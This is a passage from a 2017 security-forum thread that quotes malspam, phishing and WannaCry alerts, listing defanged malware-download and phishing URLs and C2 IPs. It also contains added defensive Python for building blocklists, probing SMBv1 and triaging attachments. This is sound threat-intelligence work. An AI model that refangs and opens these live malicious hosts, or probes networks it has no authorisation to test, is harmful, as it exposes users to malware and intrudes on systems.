> https://www.virustot...cc5ce/analysis/

wersy .net: 217.29.53.99: https://www.virustot...99/information/
> https://www.virustot...0680e/analysis/
___

Fake 'invoice' SPAM - using docs with embedded ole objects
- https://myonlinesecu...ed-ole-objects/
11 May 2017 - "... banking Trojans. This one is using a different delivery method to try to throw us off track... this has a word docx attachment that contains an embedded ole object that when you click on the blurry image in the word doc, thinking you are opening an invoice you actually open & run the embedded hidden .js file. This pretends to be an invoice coming from random senders:
> https://myonlinesecu...-ole-object.png

Screenshot: https://myonlinesecu...ozi-invoice.png

7398219046.docx - Current Virus total detections 2/58*. Payload Security** shows the dropped .js file but doesn’t make it available for download. I had to get that manually (VirusTotal 1/55***) (Payload Security[4]) which shows
 the same connections and download from one or both of these locations
  http ://schuetzen-neusalz .de/images/banners/gbfont.se -or- http ://wersy .net/cuts.vs
which is renamed and autorun by the script (VirusTotal 9/62[5]) (Payload Security[6])... This email attachment contains what appears to be a genuine word doc or Excel XLS spreadsheet with either a macro script or an embedded OLE object that when run will infect you... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1494509580/

** https://www.hybrid-a...vironmentId=100

*** https://www.virustot...sis/1494508789/

4] https://www.hybrid-a...vironmentId=100

5] https://www.virustot...sis/1494488118/

6] https://www.hybrid-a...vironmentId=100

schuetzen-neusalz .de: 85.13.146.159: https://www.virustot...59/information/
> https://www.virustot...cc5ce/analysis/

wersy .net: 217.29.53.99: https://www.virustot...99/information/
> https://www.virustot...0680e/analysis/
___

New ‘Jaff’ ransomware via Necurs ...
- https://blog.malware...asks-for-2-btc/
May 11, 2017 - "... yet another ransomware on the block, but contrary to the many copycats out there this one appears to be more serious and widespread since it is part of the Necurs spam campaigns... Jaff ransomware looks very identical to Locky in many ways: same distribution via the Necurs botnet, same PDF that opens up a Word document with a macro, and also similar payment page:
> https://blog.malware...17/05/email.png
...
> https://blog.malware.../Jaff_decoy.png
... this is where the comparison ends, since the code base is different as well as the ransom itself. Jaff asks for an astounding 2 BTC, which is about $3,700 at the time of writing:
> https://blog.malware...5/encrypted.png
...  the return of Locky after a short hiatus has not been as big as anticipated. The appearance of the Jaff ransomware may also take away some market shares from it."
 



Edited by AplusWebMaster, 11 May 2017 - 02:26 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
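The write-ups quoted above publish their indicators defanged ('hxxp ://', 'easysupport .us', 'primary-ls .ru\jhg6fgh') and some, like the dynamoo post, end with a recommended blocklist. Below is an added example, my own code and not from the forum post or any of the blogs it quotes, that turns that style of text back into a blocklist. It assumes one convention that holds across these posts: hostile URLs and domains are always defanged while reference links (VirusTotal, Hybrid Analysis, screenshots) never are, so only defanged lines are mined for hosts, and truncated links ('virustot...') are treated as debris and ignored. The sample text is constructed from indicator lines quoted in the posts above.

```python
"""Refang the defanged indicators quoted in malspam write-ups and emit a blocklist.

Added example, not code from the forum post or the blogs it quotes. Working
assumption (true of the posts above): hostile URLs and domains are defanged
('hxxp ://', 'example .com'), reference links never are, so a URL or domain is
taken as an indicator only when the line it sits on was defanged. Truncated
links ('virustot...') are extraction debris and are skipped.
"""
import ipaddress
import re

HOST = r"[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+"
IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
URL_RE = re.compile(r"(https?)://(" + HOST + r")([/\\][^\s\"'<>)]*)?")
RESOLVE_RE = re.compile(r"^\s*(" + HOST + r"):\s*(" + IPV4 + r")")       # 'wersy .net: 217.29.53.99: ...'
IP_LINE_RE = re.compile(r"^\s*(" + IPV4 + r")(?:\s+-\s+(" + HOST + r"))?\s*(?::|$)")  # '198.58.93.28 - easysupport .us'
BARE_RE = re.compile(r"^\s*(" + HOST + r")[/\\](\S*)")                  # 'wipersdirect .com/f87346b'
DOMAIN_LINE_RE = re.compile(r"^\s*(" + HOST + r")\s*$")                 # 'trialinsider .com'

# Constructed sample: lines copied from the indicator sections of the posts above.
SAMPLE = r"""
They -all- have a pdf attachment that drops a word doc with macros...
wipersdirect .com/f87346b
tending .info/f87346b
  http ://schuetzen-neusalz .de/images/banners/gbfont.se -or- http ://wersy .net/cuts.vs
 hxxp ://mdnchdbde .pw/search.php which delivers a file 1 (VirusTotal 6/59*)
This currently gives a recommended blocklist of:
47.91.107.213
trialinsider .com
easysupport .us
198.58.93.28 - easysupport .us
schuetzen-neusalz .de: 85.13.146.159: https://www.virustot...59/information/
> https://www.virustot...cc5ce/analysis/
primary-ls .ru\jhg6fgh
* https://www.hybrid-a...vironmentId=100
Screenshot: https://myonlinesecu...d-image_pdf.png
"""


def refang(line):
    """Undo the common defanging styles: hxxp, 'http ://', 'example .com', 'example[.]com'."""
    s = re.sub(r"hxxp", "http", line, flags=re.I)
    s = re.sub(r"\s*:\s*//\s*", "://", s)
    s = re.sub(r"\s*[\[(]\.[\])]\s*", ".", s)
    s = re.sub(r"(?<=[A-Za-z0-9])\s+\.(?=[A-Za-z0-9])", ".", s)
    return s


def valid_domain(host):
    labels = host.lower().split(".")
    return all(labels) and len(labels) >= 2 and labels[-1].isalpha() and len(labels[-1]) >= 2


def valid_ip(ip):
    try:
        return ipaddress.ip_address(ip).is_global   # drops private/reserved space and garbage
    except ValueError:
        return False


def blocklist(text):
    """Return sorted domains, IPs and URLs mined from defanged indicator text."""
    domains, ips, urls = set(), set(), set()
    for raw in text.splitlines():
        line = refang(raw)
        defanged = line != raw
        got_url = False
        for m in URL_RE.finditer(line):
            scheme, host, path = m.group(1), m.group(2).lower(), (m.group(3) or "").replace("\\", "/")
            # skip anything not defanged in the source, and hosts cut short by '...'
            if not defanged or line[m.end():m.end() + 1] == "." or "..." in m.group(0) or not valid_domain(host):
                continue
            domains.add(host)
            urls.add(f"{scheme}://{host}{path}")
            got_url = True
        if got_url:
            continue
        m = RESOLVE_RE.match(line)              # 'domain: IP:' resolution lines
        if m and valid_domain(m.group(1)) and valid_ip(m.group(2)):
            domains.add(m.group(1).lower())
            ips.add(m.group(2))
            continue
        m = IP_LINE_RE.match(line)              # bare IP, optionally '- domain'
        if m:
            if valid_ip(m.group(1)):
                ips.add(m.group(1))
            if m.group(2) and valid_domain(m.group(2)):
                domains.add(m.group(2).lower())
            continue
        if not defanged:
            continue
        m = BARE_RE.match(line)                 # 'domain/path' with no scheme
        if m and valid_domain(m.group(1)):
            domains.add(m.group(1).lower())
            urls.add(f"http://{m.group(1).lower()}/{m.group(2)}")
            continue
        m = DOMAIN_LINE_RE.match(line)          # a domain alone on its line
        if m and valid_domain(m.group(1)):
            domains.add(m.group(1).lower())
    return {"domains": sorted(domains), "ips": sorted(ips), "urls": sorted(urls)}


if __name__ == "__main__":
    for kind, items in blocklist(SAMPLE).items():
        print(kind, *items, sep="\n  ")
```

Feed it only the indicator portion of a write-up, not the whole page: the defanged-line rule keeps VirusTotal and sandbox links out, but a mail server or sender address that the author happened to defang (the posts write 'random@ hotmail .es') would be refanged too, and only the line-start patterns above stop it being listed.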

#1926 AplusWebMaster


Posted 12 May 2017 - 06:23 AM

FYI...

Fake 'Scanned image' SPAM - delivers jaff ransomware
- https://myonlinesecu...aff-ransomware/
12 May 2017 - "An email with the subject of 'Scanned image' coming or pretending to come from random email addresses with a pdf attachment that contains an embedded malicious word doc delivers jaff ransomware...

Screenshot: https://myonlinesecu...d-image_pdf.png

20170512605164.pdf - which drops N5OSUHX.docm - Current Virus total detections [pdf*] [docm**]:
Payload Security [pdf...] [docm(4)] shows a download of an encrypted txt file from
 http ://trebleimp .com/77g643 which is converted by the macro to ratchet20.exe ... It also shows a connection to
 http ://h552terriddows .com/a5/ which gives a created message...
>> Update: managed to get the ratchet20.exe file via:
> https://jbxcloud.joe...s/268338/1/html - (VirusTotal [5]) (Payload Security[6])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1494559929/

** https://www.virustot...sis/1494562144/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
27.254.44.204
47.91.107.213


5] https://www.virustot...sis/1494559081/

6] https://www.hybrid-a...vironmentId=100

trebleimp .com: 27.254.44.204: https://www.virustot...04/information/
> https://www.virustot...4c8ba/analysis/

h552terriddows .com: 47.91.107.213: https://www.virustot...13/information/
> https://www.virustot...fcafd/analysis/
___


U.K. Hospitals Hit - Widespread Ransomware Attack
- https://krebsonsecur...somware-attack/
May 12, 2017 - "At least 16 hospitals in the United Kingdom are being forced to divert emergency patients today after computer systems there were infected with ransomware... there are indications the malware may be spreading to vulnerable systems through a security hole in Windows that was recently patched by Microsoft:
Ransom note left behind on computers infected with the Wanna Decryptor ransomware strain.
Image: BleepingComputer

> https://krebsonsecur...nna-580x285.png
In a statement*, the U.K.’s National Health Service (NHS) said a number of NHS organizations had suffered ransomware attacks... According to CCN-CERT, that flaw is MS17-010**, a vulnerability in the Windows Server Message Block (SMB) service, which Windows computers rely upon to share files and printers across a local network. Malware that exploits SMB flaws could be extremely dangerous inside of corporate networks because the file-sharing component may help the ransomware spread rapidly from one infected machine to another..."
* https://www.digital....HS-cyber-attack

** https://technet.micr...y/ms17-010.aspx
March 14, 2017

 



Edited by AplusWebMaster, 12 May 2017 - 02:01 PM.


#1927 AplusWebMaster


Posted 15 May 2017 - 04:31 AM

FYI...

Indicators Associated With WannaCry Ransomware
- https://www.us-cert....lerts/TA17-132A
Last revised: May 15, 2017 - "... According to numerous open-source reports, a widespread ransomware campaign is affecting various organizations with reports of tens of thousands of infections in as many as 74 countries, including the United States, United Kingdom, Spain, Russia, Taiwan, France, and Japan. The software can run in as many as 27 different languages. The latest version of this ransomware variant, known as WannaCry, WCry, or Wanna Decryptor, was discovered the morning of May 12, 2017, by an independent security researcher and has spread rapidly over several hours... Initial reports indicate the hacker or hacking group behind the WannaCry campaign is gaining access to enterprise servers either through Remote Desktop Protocol (RDP) compromise or through the exploitation of a critical Windows SMB vulnerability. Microsoft released a security update for the MS17-010* vulnerability on March 14, 2017. Additionally, Microsoft released patches for Windows XP, Windows 8, and Windows Server 2003 operating systems on May 13, 2017. According to open sources, one possible infection vector is via phishing emails...
* https://technet.micr...y/ms17-010.aspx
March 14, 2017
The WannaCry ransomware received and analyzed by US-CERT is a loader that contains an AES-encrypted DLL. During runtime, the loader writes a file to disk named “t.wry”. The malware then uses an embedded 128-bit key to decrypt this file. This DLL, which is then loaded into the parent process, is the actual Wanna Cry Ransomware responsible for encrypting the user’s files. Using this cryptographic loading method, the WannaCry DLL is never directly exposed on disk and not vulnerable to antivirus software scans...
Precautionary measures to mitigate ransomware threats include:
- Ensure anti-virus software is up-to-date.
- Implement a data back-up and recovery plan to maintain copies of sensitive or proprietary data in a separate and secure location. Backup copies of sensitive data should not be readily accessible from local networks.
- Scrutinize -links- contained in -e-mails- and do -not- open -attachments- included in unsolicited e-mails.
- Only download software – especially free software – from sites you know and trust.
- Enable automated patches for your operating system and Web browser..."
(More detail at the us-cert URL at the top of this post).

WannaCry/WannaCrypt Ransomware Summary
- https://isc.sans.edu...l?storyid=22420
2017-05-15
___

> http://blog.talosint...nacry.html#more
May 12, 2017 - "... Umbrella* prevents DNS resolution of the domains associated with malicious activity..."
* https://umbrella.cisco.com/
... aka 'OpenDNS' - FREE:
>> https://www.opendns..../?new=home-free

Test -after- setups: https://welcome.opendns.com/
___

Fake 'invoice' SPAM - delivers pdf attachment jaff ransomware
- https://myonlinesecu...eliver-malware/
15 May 2017 - "An email pretending to be an invoice coming from random senders with a PDF attachment that drops a malicious macro enabled word doc...
Update: confirmed as Jaff ransomware (VirusTotal 5/61*) (Payload Security**)...

Screenshot: https://myonlinesecu...ent-malspam.png

... An alternative docm file that was extracted confirms it to be jaff ransomware; it downloads an encrypted txt from
 ecuamiaflowers .com/hHGFjd (Payload Security[3]) (VirusTotal 13/56[4]) JoeSandbox[5]... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1494846406/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
47.91.107.213

3] https://www.hybrid-a...vironmentId=100
Contacted Hosts
107.180.14.32
47.91.107.213


4] https://www.virustot...sis/1494844454/

5] https://jbxcloud.joe...s/271421/1/html

ecuamiaflowers .com: 107.180.14.32: https://www.virustot...32/information/
> https://www.virustot...85814/analysis/

h552terriddows .com: 47.91.107.213: https://www.virustot...13/information/
> https://www.virustot...42c85/analysis/
 



Edited by AplusWebMaster, 15 May 2017 - 07:31 AM.

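WannaCry's worm component spreads over SMB through the MS17-010 flaw, and the US-CERT material above says patched systems are not vulnerable. A check many admins want after a patch cycle is whether a host still negotiates SMBv1 at all, since that is the protocol the exploit needs. Below is an added example, my own code and not from US-CERT or the quoted posts: it sends one SMB1 NEGOTIATE offering only the "NT LM 0.12" dialect and reports whether the server accepts it. It assumes plain TCP 445 and an unauthenticated negotiate. A host that refuses SMBv1 is not thereby proven patched, it simply does not offer the protocol; a host that accepts it should have MS17-010 applied and SMBv1 disabled. The canned responses used for the self-test are constructed, not captured.

```python
"""Probe whether a host still negotiates SMBv1 (the protocol MS17-010 / WannaCry abuse).

Added example, not from US-CERT or the posts above. One SMB1 NEGOTIATE is sent
offering only the "NT LM 0.12" dialect. A server answering with an SMB1 header
and dialect index 0 still speaks SMBv1; one that resets, times out, or answers
with an SMB2 header does not offer it. This is a protocol check, not a
vulnerability check: a host that accepts SMBv1 may or may not be patched.
"""
import socket
import struct

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"
SMB_COM_NEGOTIATE = 0x72
DIALECTS = (b"NT LM 0.12",)       # SMBv1 only; "SMB 2.002" is deliberately not offered


def build_negotiate(dialects=DIALECTS):
    """SMB1 NEGOTIATE request wrapped in a NetBIOS session message (MS-CIFS 2.2.4.52)."""
    header = (
        SMB1_MAGIC
        + bytes([SMB_COM_NEGOTIATE])
        + b"\x00" * 4                              # NT status (unused in a request)
        + b"\x18"                                  # Flags: case-insensitive, canonicalised paths
        + struct.pack("<H", 0x4801)                # Flags2: long names, extended security, NT status
        + b"\x00" * 2                              # PIDHigh
        + b"\x00" * 8                              # SecurityFeatures (no signing)
        + b"\x00" * 2                              # Reserved
        + struct.pack("<HHHH", 0, 0x1234, 0, 0)    # TID, PIDLow, UID, MID
    )
    assert len(header) == 32
    body = b"".join(b"\x02" + d + b"\x00" for d in dialects)      # buffer-format dialect strings
    smb = header + b"\x00" + struct.pack("<H", len(body)) + body   # WordCount=0, ByteCount, dialects
    return b"\x00" + struct.pack(">I", len(smb))[1:] + smb         # NetBIOS: type 0, 3-byte length


def parse_negotiate_response(data):
    """Return ('smb1', dialect_index), ('smb2', None) or ('none', None)."""
    smb = data[4:]                                 # strip the NetBIOS session header
    if smb.startswith(SMB2_MAGIC):
        return ("smb2", None)
    if not smb.startswith(SMB1_MAGIC) or len(smb) < 35 or smb[4] != SMB_COM_NEGOTIATE:
        return ("none", None)
    if smb[32] == 0:                               # WordCount 0: error response, no parameters
        return ("smb1", None)
    return ("smb1", struct.unpack("<H", smb[33:35])[0])   # 0xFFFF means no dialect accepted


def verdict(result):
    kind, idx = result
    if kind == "smb1" and idx is not None and idx != 0xFFFF:
        return "SMBv1 ENABLED (server accepted dialect %d)" % idx
    if kind == "smb1":
        return "SMBv1 header seen but no dialect accepted"
    if kind == "smb2":
        return "SMB2/3 only"
    return "no SMB negotiate response"


def probe(host, port=445, timeout=3.0):
    """Live check; ('none', None) on connection reset or timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_negotiate())
            return parse_negotiate_response(s.recv(4096))
    except OSError:
        return ("none", None)


def sample_smb1_response(word_count, dialect_index):
    """Constructed SMB1 NEGOTIATE response for testing without a server."""
    header = (SMB1_MAGIC + bytes([SMB_COM_NEGOTIATE]) + b"\x00" * 4 + b"\x98"
              + struct.pack("<H", 0xC801) + b"\x00" * 20)
    smb = header + bytes([word_count]) + struct.pack("<H", dialect_index) + b"\x00" * 32
    return b"\x00" + struct.pack(">I", len(smb))[1:] + smb


SAMPLE_ACCEPT = sample_smb1_response(17, 0)        # what an SMBv1-enabled server returns
SAMPLE_REJECT = sample_smb1_response(1, 0xFFFF)    # SMBv1 header but nothing we offered accepted
SAMPLE_SMB2 = b"\x00\x00\x00\x40" + SMB2_MAGIC + b"\x00" * 60

if __name__ == "__main__":
    import sys
    print(verdict(probe(sys.argv[1]) if len(sys.argv) > 1 else parse_negotiate_response(SAMPLE_ACCEPT)))
```

Run it against hosts you are authorised to test; on a Windows server with SMBv1 removed the connection is usually reset, which the probe reports as no response rather than as a refusal.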

#1928 AplusWebMaster


Posted 16 May 2017 - 05:25 AM

FYI...

Fake 'invoice' SPAM - downloads Cerber ransomware
- https://myonlinesecu...eliver-malware/
16 May 2017 - "... an empty/blank email with the subject of 'Re: invoice 28769' coming or pretending to come from random companies, names and email addresses with a semi-random named zip attachment that contains another zip that in turn contains a .js file... downloads Cerber ransomware...

Screenshot: https://myonlinesecu...nvoice28769.png

... I am reliably informed[1] that with a couple of minor fixes to correct the malware developers mistakes this downloads Cerber ransomware from
 hxxp ://mdnchdbde .pw/search.php which delivers a file 1 (VirusTotal 6/59*) (Payload Security**)... 'certain that they will fix it in the next malspam run. These criminal gangs often send a small spam run out to "test the waters" and when they don't get any expected result they double check & fix the errors ready for the next spam run.

262647732.zip: extracts to 27000_packed.zip: which in turn Extracts to: 27000.js
Current Virus total detections 0/57[3]:  Payload Security[4] Joebox[5] - none of the online sandboxes managed to get any download location or malware content from the .js file... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://twitter.com/...350538112016385

* https://www.virustot...sis/1494912080/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts (1088)

3] https://www.virustot...sis/1494910036/

4] https://www.hybrid-a...vironmentId=100

5] https://jbxcloud.joe...s/271922/1/html

mdnchdbde .pw: 35.163.27.202: https://www.virustot...02/information/
> https://www.virustot...f809c/analysis/
___

Fake 'pdf attachments' SPAM - delivers Jaff ransomware
- https://myonlinesecu...aff-ransomware/
16 May 2017 - "... series of emails with pdf attachments that drop a malicious macro enabled word doc is an email with the subject of 'Emailing: 2650032.pdf' (random numbers) pretending to come from random names at your-own-email-address that delivers Jaff ransomware...

Screenshot: https://myonlinesecu...2650032_pdf.png

2650032.pdf - Current Virus total detections 8/54*: Payload Security**... drops EYRCUD.docm
(VirusTotal 8/59***) (Payload Security[4])... downloads an encrypted txt file from
  http ://personalizar .net/Nbiyure3  which is converted by the script to galaperidol8.exe ... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1494926923/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
81.88.57.70
47.91.107.213


*** https://www.virustot...sis/1494927173/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
81.88.57.70
47.91.107.213


personalizar .net: 81.88.57.70: https://www.virustot...70/information/
> https://www.virustot...774c2/analysis/
 



Edited by AplusWebMaster, 16 May 2017 - 08:12 AM.


#1929 AplusWebMaster


Posted 17 May 2017 - 06:10 AM

FYI...

Fake 'Secure Message' SPAM - delivers trickbot
- https://myonlinesecu...ivers-trickbot/
17 May 2017 - "An email with the subject of 'You have received a new Bankline Secure Message' pretending to come from Bankline RSA but actually coming from a look-a-like domain Bankline RSA <SecureMessage@ banklinersa .co.uk> with a malicious word doc attachment... delivering Trickbot banking Trojan...

Screenshot: https://myonlinesecu...ure-message.png

... criminals sending these have registered various domains that look like genuine bank domains. Normally there are 3 or 4 newly registered domains that imitate the bank or some message sending service that can easily be confused with a legitimate organisation in some way that send these. So far we have only found 1 domain today banklinersa .co.uk. As usual they are registered via Godaddy as registrar and for a change the emails are sent via rackspace hosting not the usual citynetwork AB in Sweden. They are currently using IP numbers 104.130.29.210, 172.99.115.203, 172.99.115.216, 172.99.115.23, 104.239.169.15, 104.130.29.243, 104.130.29.245, 172.99.115.29...

SecureMessage.doc - Current Virus total detections 4/56*. Payload Security** downloads from
  http ://ocysf .org/wp-content/GktpotdC7dyTH1aoroa.png  which of course is -not- an image file but a renamed .exe file that gets -renamed- to a .exe and autorun (VirusTotal 10/60***)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1495019899/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
50.87.146.185
107.22.214.64
95.104.2.225
192.157.238.15


*** https://www.virustot...sis/1495019988/

ocysf .org: 50.87.146.185: https://www.virustot...85/information/
> https://www.virustot...d6f8a/analysis/
___

Adobe account - Phish
- https://myonlinesecu...text-data-urls/
17 May 2017 - "... 'thought this was going to be some newer malware delivery method, but it is only -phishing- for email credentials, which of course is also extremely serious and very bad.
NOTE: This phishing scam only works in Google Chrome. Internet Explorer will not open data:text/html urls and gives a 'cannot display' page message. Firefox refuses to display anything - just a white screen with the original url in the address bar...

Screenshot: https://myonlinesecu...shing-email.png

This email has a genuine PDF attachment that contains a blurred out image of an invoice with the prompt to view the Secured PDF Online Document on Adobe:
> https://myonlinesecu...ice1246_pdf.png
-If- you click on the blurred image you get a pop up warning about links. When you follow the link inside the pdf it sends you to http ://tiny .cc/tis7ky which immediately -redirects- to
 http ://qualifiedplans .com/administrator/components/com_smartformer/plugins/tiny_mce/plugins/inlinepopups/skins/clearlooks2/img/phmho/
  where it downloads/opens a data:text url that displays a web page on your computer -not- an external site looking like:
> https://myonlinesecu...5/timed_out.png
After you press OK you get what looks-like an Adobe Business sign in page with what looks-like a download button. I inserted the usual set of fake details & pressed download, expecting some sort of malware to appear, but no it just -bounced- me on to the genuine Adobe page while your stolen data is sent to  http ://setas2016 .com/image/catalog/Katalog/files/pageConfig/PDF3/index/adobe.php
With a bit of digging around We have discovered the complete phish is also hosted on  http ://setas2016 .com/image/catalog/Katalog/files/pageConfig ...
> https://myonlinesecu...obe_sign_in.png
The data:text/html  file is available for download via Payload Security*. It is in the extracted files section named urlref_httptiny .cctis7ky ..."
* https://www.hybrid-a...vironmentId=100

setas2016 .com: 87.118.140.114: https://www.virustot...14/information/
> https://www.virustot...7fab9/analysis/
___

ICS-ALERT-17-135-01A
Indicators Associated With WannaCry Ransomware (Update A)
> https://ics-cert.us-...LERT-17-135-01A
Original release date: May 15, 2017 | Last revised: May 16, 2017
"... updated alert is a follow-up to the original alert titled ICS-ALERT-17-135-01 Indicators Associated With WannaCry Ransomware that was published May 15, 2017, on the NCCIC/ICS-CERT web site..."
(More detail at the URL above.)
 



Edited by AplusWebMaster, 17 May 2017 - 08:30 AM.


#1930 AplusWebMaster


Posted 18 May 2017 - 05:31 AM

FYI...

Fake 'UPS' SPAM - delivers banking Trojan
- https://myonlinesecu...banking-trojan/
18 May 2017 - "... some are being delivered with the word -doc- attachment, but about half are just getting the email body with an -HTML- attachment which has the same details as the email body and no word doc attachment... the details with an email with the subject of 'Fwd: UPS Worldwide Saver Notification' pretending to come from various random names @ yahoo. es -or- .de -or- .pt -or- from random@ hotmail .es -or- de . We are also seeing a sprinkling from other free webmail services like web .de with a malicious word doc attachment with a random number delivers ursnif banking Trojan. I am also seeing other parcel delivery companies like TNT and unnamed delivery services also being imitated and -spoofed- in this campaign. The TNT ones are zips with word docs inside. -All- of them today are using embedded OLE objects rather than macros to deliver Ursnif banking and password stealing Trojans.
Update: Now seeing some coming through with zip attachments containing .js files
Some subjects include:
    TNT Express – Documents – RL54413826 ( random numbers)
    Order Processed
    Export Scan
    Fwd: UPS Worldwide Saver Notification ...

Screenshot: https://myonlinesecu...dwide-saver.png

These word docs contain 2 images of what pretend to be another word doc and an xls file both pretending to be invoices, however they are embedded ole objects and drop 2 different named but identical .js files when clicked on:
> https://myonlinesecu...ole-objects.png
The TNT version has a slightly different email content and word attachment, although still downloading from the -same- urls as other versions:
> https://myonlinesecu...elivery-doc.png
...

doc60 for clearance.doc - Current Virus total detections 0/58*. Payload Security** drops a js file
(VirusTotal 1/22***) (Payload Security[4]) downloads from one of these 2 locations:
  http ://dacera .net/horizont.cv -or- http ://raimco .com/case.sub
and gets converted/renamed to a working .exe file (VirusTotal 9/61[5])

TNT version: RL82670483822.zip extracts to RL02993847001.doc VirusTotal 0/57[6]| Payload Security[7]

Zip/JS version: QPABA0MCY0D2.zip extracts to 1A029837T2990101.pdf.js VirusTotal 3/57[8]|
Payload Security[9] ... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1495100198/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
2.17.22.36

*** https://www.virustot...sis/1495100566/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
54.149.71.19
77.104.189.47


5] https://www.virustot...8889a/analysis/

6] https://www.virustot...sis/1495101803/

7] https://www.hybrid-a...vironmentId=100

8] https://www.virustot...sis/1495102966/

9] https://www.hybrid-a...vironmentId=100

dacera .net: 54.149.71.19: https://www.virustot...19/information/
> https://www.virustot...49b60/analysis/

raimco .com: 77.104.189.47: https://www.virustot...47/information/
> https://www.virustot...8889a/analysis/

dacera .net/horizont.cv
> https://www.virustot...49b60/analysis/

raimco .com/case.sub
> https://www.virustot...ec432/analysis/
___

Fake 'FedEx' SPAM - delivers -kovter- malware
- https://myonlinesecu...w-using-macros/
18 May 2017 - "An email with the subject of 'FedEx Parcel #262844740, Delivery Unsuccessful' pretending to come from FedEx Customer Service <tamawuv52640888@ soie. in> (random email addresses) with a malicious word doc attachment delivers multiple malware... 'used to seeing these -fake- FedEx and other parcel delivery services emails, but they usually contain zip files and js files. It is -unusual- to have word macro attachments...

Screenshot: https://myonlinesecu...ex-delivery.png

The instructions and image in the macro laden word doc have also -changed- from previous versions:
> https://myonlinesecu...elivery-doc.png

info_delivery.doc - Current Virus total detections 5/58*. Payload Security** shows a download from
  http ://regereeeeee .com/gate2.php?ff1 which appears to be a massive encrypted txt file (833kb) which appears to drop -kovter- (b215.exe ***) (VirusTotal 14/61[4])... This email attachment contains what appears to be a genuine word doc or Excel XLS spreadsheet with either a macro script -or- an embedded OLE object that when run will infect you... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...c2b00/analysis/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts (424)

*** https://www.hybrid-a...c0183af2e4be850
Contacted Hosts (424)

4] https://www.virustot...sis/1495118313/

regereeeeee .com: 13.58.26.56: https://www.virustot...56/information/
> https://www.virustot...5b9d4/analysis/

> https://www.virustot...9c005/analysis/
___

WannaCry Fact Sheet
- https://www.us-cert....aCry-Fact-Sheet
Last revised: May 18, 2017
>> https://ics-cert.us-..._Ransomware.pdf
"... Systems that have installed the MS17-010 patch* are -not- vulnerable to the exploits..."
* https://technet.micr...y/ms17-010.aspx
March 14, 2017
 



Edited by AplusWebMaster, 19 May 2017 - 05:40 AM.

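Across the posts above the attachment takes one of a few shapes: a PDF with an embedded Word document (Jaff), a .docm carrying a VBA project (FedEx/kovter, the Bankline doc), a .docx whose 'invoice' picture is really an embedded OLE object holding a .js file (the UPS/TNT Ursnif docs, GlobeImposter), or a script with a double extension such as 'DECLARATION (FORM).PDF.js'. Below is an added example, my own code and not from any of the quoted blogs, that statically triages a mailed attachment for those features using only the Python standard library. The sample PDF and Office files are constructed inside the script and the finding tags are my own naming. Caveat: the PDF scan only sees names that sit in uncompressed object dictionaries, so a PDF that hides its catalog inside an object stream needs a real parser (pdf-parser or peepdf), and legacy OLE2 .doc/.xls files need olevba or oledump for macro extraction.

```python
"""Static triage of mailed attachments of the kinds described above.

Added example, not code from the quoted blogs. Standard library only. Flags
PDFs with an embedded file or automatic action, Office OOXML files carrying a
VBA project or an embedded OLE object, legacy OLE2 files, and double
extensions such as 'invoice.pdf.js'. Sample files are constructed below.
"""
import io
import os
import re
import zipfile

# PDF name objects worth a second look in a mailed document. /EmbeddedFile is
# the one the PDF-wrapped Word documents depend on.
PDF_MARKERS = (b"/EmbeddedFile", b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch")
SCRIPT_EXT = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".exe", ".scr", ".lnk"}
DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}


def _decode_pdf_names(data):
    """Undo #xx escapes in PDF names (/J#61vaScript -> /JavaScript)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def triage_pdf(data):
    data = _decode_pdf_names(data)
    # the lookahead stops /JS matching /JSx and /EmbeddedFile matching the /EmbeddedFiles name tree
    return [m.decode() for m in PDF_MARKERS if re.search(re.escape(m) + rb"(?![A-Za-z])", data)]


def triage_ooxml(data):
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["bad-zip"]
    names = zf.namelist()
    found = []
    if any(n.lower().endswith("/vbaproject.bin") for n in names):
        found.append("vba-project")
    found += ["embedded-object:" + n for n in names if "/embeddings/" in n.lower()]
    if "[Content_Types].xml" in names and b"macroEnabled" in zf.read("[Content_Types].xml"):
        found.append("macro-enabled-content-type")
    return found


def suspicious_name(name):
    """'invoice.pdf.js' style: a script extension hiding behind a document extension."""
    base, ext = os.path.splitext(name.lower())
    return ext in SCRIPT_EXT and os.path.splitext(base)[1] in DOC_EXT


def triage(name, data):
    """Pick the parser by magic bytes, not by the claimed extension."""
    if data.startswith(b"%PDF"):
        kind, found = "pdf", triage_pdf(data)
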